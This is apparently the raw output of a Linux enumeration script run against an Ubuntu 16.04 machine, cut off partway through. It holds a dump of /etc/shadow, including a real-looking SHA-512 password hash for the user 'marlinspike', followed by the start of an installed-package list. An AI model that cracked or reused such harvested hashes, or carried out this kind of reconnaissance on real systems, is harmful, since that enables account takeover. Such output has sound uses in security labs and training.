root:!:17484:0:99999:7::: daemon:*:17379:0:99999:7::: bin:*:17379:0:99999:7::: sys:*:17379:0:99999:7::: sync:*:17379:0:99999:7::: games:*:17379:0:99999:7::: man:*:17379:0:99999:7::: lp:*:17379:0:99999:7::: mail:*:17379:0:99999:7::: news:*:17379:0:99999:7::: uucp:*:17379:0:99999:7::: proxy:*:17379:0:99999:7::: www-data:*:17379:0:99999:7::: backup:*:17379:0:99999:7::: list:*:17379:0:99999:7::: irc:*:17379:0:99999:7::: gnats:*:17379:0:99999:7::: nobody:*:17379:0:99999:7::: systemd-timesync:*:17379:0:99999:7::: systemd-network:*:17379:0:99999:7::: systemd-resolve:*:17379:0:99999:7::: systemd-bus-proxy:*:17379:0:99999:7::: syslog:*:17379:0:99999:7::: _apt:*:17379:0:99999:7::: messagebus:*:17379:0:99999:7::: uuidd:*:17379:0:99999:7::: lightdm:*:17379:0:99999:7::: whoopsie:*:17379:0:99999:7::: avahi-autoipd:*:17379:0:99999:7::: avahi:*:17379:0:99999:7::: dnsmasq:*:17379:0:99999:7::: colord:*:17379:0:99999:7::: speech-dispatcher:!:17379:0:99999:7::: hplip:*:17379:0:99999:7::: kernoops:*:17379:0:99999:7::: pulse:*:17379:0:99999:7::: rtkit:*:17379:0:99999:7::: saned:*:17379:0:99999:7::: usbmux:*:17379:0:99999:7::: marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7::: mysql:!:17486:0:99999:7::: sshd:*:17486:0:99999:7::: [*] ENUMERATING PROCESSES AND APPLICATIONS... [+] Installed Packages Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend Err?=(none)/Reinst-required (Status,Err: Name Version Description a11y-profile-manager-indicator 0.1.10-0ubuntu3 Accessibility Profile Manager - Unity desktop indicator account-plugin-facebook 0.12+16.04.20160126-0ubuntu1 GNOME Control Center account plugin for single signon - facebook account-plugin-flickr 0.12+16.04.20160126-0ubuntu1 GNOME Control Center account plugin for single signon - flickr account-plugin-google 0.12+16.04.20160126-0ubuntu1 GNOME Control Center account plugin for single signon accountsservice 0.6.40-2ubuntu11.3 query and manipulate user account information acl 2.2.52-3 Access control list utilities acpi-support 0.142 scripts for handling many ACPI events acpid 1:2.0.26-1ubuntu2 Advanced Configuration and Power Interface event daemon activity-log-manager 0.9.7-0ubuntu23.16.04.1 blacklist configuration user interface for Zeitgeist adduser 3.113+nmu3ubuntu4 add and remove users and groups adium-theme-ubuntu 0.3.4-0ubuntu1.1 Adium message style for Ubuntu adwaita-icon-theme 3.18.0-2ubuntu3.1 default icon theme of GNOME (small subset) aisleriot 1:3.18.2-1ubuntu1 GNOME solitaire card game collection alsa-base 1.0.25+dfsg-0ubuntu5 ALSA driver configuration files alsa-utils 1.1.0-0ubuntu5 Utilities for configuring and using ALSA anacron 2.3-23 cron-like program that doesn't go by time apache2 2.4.18-2ubuntu3.5 Apache HTTP Server apache2-bin 2.4.18-2ubuntu3.5 Apache HTTP Server (modules and other binary files) apache2-data 2.4.18-2ubuntu3.5 Apache HTTP Server (common files) apache2-utils 2.4.18-2ubuntu3.5 Apache HTTP Server (utility programs for web servers) apg 2.2.3.dfsg.1-2ubuntu1 Automated Password Generator - Standalone version app-install-data 15.10 Ubuntu applications (data files) app-install-data-partner 16.04 Application Installer (data files for partner applications/repositories) apparmor 2.10.95-0ubuntu2.7 user-space parser utility for AppArmor appmenu-qt:amd64 0.2.7+14.04.20140305-0ubuntu2 application menu for Qt appmenu-qt5 0.3.0+16.04.20170216-0ubuntu1 application menu for Qt5 apport 2.20.1-0ubuntu2.10 automatically generate crash reports for debugging apport-gtk 2.20.1-0ubuntu2.10 GTK+ frontend for the apport crash report system apport-symptoms 0.20 symptom scripts for apport appstream 0.9.4-1ubuntu3 Software component index apt 1.2.24 commandline package manager apt-transport-https 1.2.24 https download transport for APT apt-utils 1.2.24 package management related utility programs aptdaemon 1.1.1+bzr982-0ubuntu14 transaction based package management service aptdaemon-data 1.1.1+bzr982-0ubuntu14 data files for clients apturl 0.5.2ubuntu11.1 install packages using the apt protocol - GTK+ frontend apturl-common 0.5.2ubuntu11.1 install packages using the apt protocol - common data aspell 0.60.7~20110707-3build1 GNU Aspell spell-checker aspell-en 7.1-0-1.1 English dictionary for GNU Aspell at-spi2-core 2.18.3-4ubuntu1 Assistive Technology Service Provider Interface (dbus core) avahi-autoipd 0.6.32~rc+dfsg-1ubuntu2 Avahi IPv4LL network address configuration daemon avahi-daemon 0.6.32~rc+dfsg-1ubuntu2 Avahi mDNS/DNS-SD daemon avahi-utils 0.6.32~rc+dfsg-1ubuntu2 Avahi browsing, publishing and discovery utilities bamfdaemon 0.5.3~bzr0+16.04.20160824-0ubuntu1 Window matching library - daemon baobab 3.18.1-1ubuntu1 GNOME disk usage analyzer base-files 9.4ubuntu4.5 Debian base system miscellaneous files base-passwd 3.5.39 Debian base system master password and group files bash 4.3-14ubuntu1.2 GNU Bourne Again SHell bash-completion 1:2.1-4.2ubuntu1.1 programmable completion for the bash shell bc 1.06.95-9build1 GNU bc arbitrary precision calculator language bind9-host 1:9.10.3.dfsg.P4-8ubuntu1.8 Version of 'host' bundled with BIND 9.X binutils 2.26.1-1ubuntu1~16.04.5 GNU assembler, linker and binary utilities bluez 5.37-0ubuntu5.1 Bluetooth tools and daemons bluez-cups 5.37-0ubuntu5.1 Bluetooth printer driver for CUPS bluez-obexd 5.37-0ubuntu5.1 bluez obex daemon branding-ubuntu 0.8 Replacement artwork with Ubuntu branding brltty 5.3.1-2ubuntu2.1 Access software for a blind person using a braille display bsdmainutils 9.0.6ubuntu3 collection of more utilities from FreeBSD bsdutils 1:2.27.1-6ubuntu3.3 basic utilities from 4.4BSD-Lite build-essential 12.1ubuntu2 Informational list of build-essential packages busybox-initramfs 1:1.22.0-15ubuntu1 Standalone shell setup for initramfs busybox-static 1:1.22.0-15ubuntu1 Standalone rescue shell with tons of builtin utilities bzip2 1.0.6-8 high-quality block-sorting file compressor - utilities ca-certificates 20170717~16.04.1 Common CA certificates checkbox-converged 1.2.4-0ubuntu1 testing tool for all Ubuntu devices checkbox-gui 1.2.4-0ubuntu1 QML based interface for checkbox (transitional package) cheese 3.18.1-2ubuntu3 tool to take pictures and videos from your webcam cheese-common 3.18.1-2ubuntu3 Common files for the Cheese tool to take pictures and videos colord 1.2.12-1ubuntu1 system service to manage device colour profiles -- system daemon colord-data 1.2.12-1ubuntu1 system service to manage device colour profiles -- data files command-not-found 0.3ubuntu16.04.2 Suggest installation of packages in interactive bash sessions command-not-found-data 0.3ubuntu16.04.2 Set of data files for command-not-found. compiz 1:0.9.12.2+16.04.20160823-0ubuntu1 OpenGL window and compositing manager compiz-core 1:0.9.12.2+16.04.20160823-0ubuntu1 OpenGL window and compositing manager compiz-gnome 1:0.9.12.2+16.04.20160823-0ubuntu1 OpenGL window and compositing manager - GNOME window decorator compiz-plugins-default:amd64 1:0.9.12.2+16.04.20160823-0ubuntu1 OpenGL window and compositing manager - default plugins console-setup 1.108ubuntu15.3 console font and keymap setup program console-setup-linux 1.108ubuntu15.3 Linux specific part of console-setup coreutils 8.25-2ubuntu3~16.04 GNU core utilities cpio 2.11+dfsg-5ubuntu1 GNU cpio -- a program to manage archives of files cpp 4:5.3.1-1ubuntu1 GNU C preprocessor (cpp) cpp-5 5.4.0-6ubuntu1~16.04.5 GNU C preprocessor cracklib-runtime 2.9.2-1ubuntu1 runtime support for password checker library cracklib2 crda 3.13-1 wireless Central Regulatory Domain Agent cron 3.0pl1-128ubuntu2 process scheduling daemon cups 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - PPD/driver support, web interface cups-browsed 1.8.3-2ubuntu3.1 OpenPrinting CUPS Filters - cups-browsed cups-bsd 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - BSD commands cups-client 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - client programs (SysV) cups-common 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - common files cups-core-drivers 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - PPD-less printing cups-daemon 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm) - daemon cups-filters 1.8.3-2ubuntu3.1 OpenPrinting CUPS Filters - Main Package cups-filters-core-drivers 1.8.3-2ubuntu3.1 OpenPrinting CUPS Filters - PPD-less printing cups-pk-helper 0.2.5-2ubuntu2 PolicyKit helper to configure cups with fine-grained privileges cups-ppdc 2.1.3-4ubuntu0.3 Common UNIX Printing System(tm)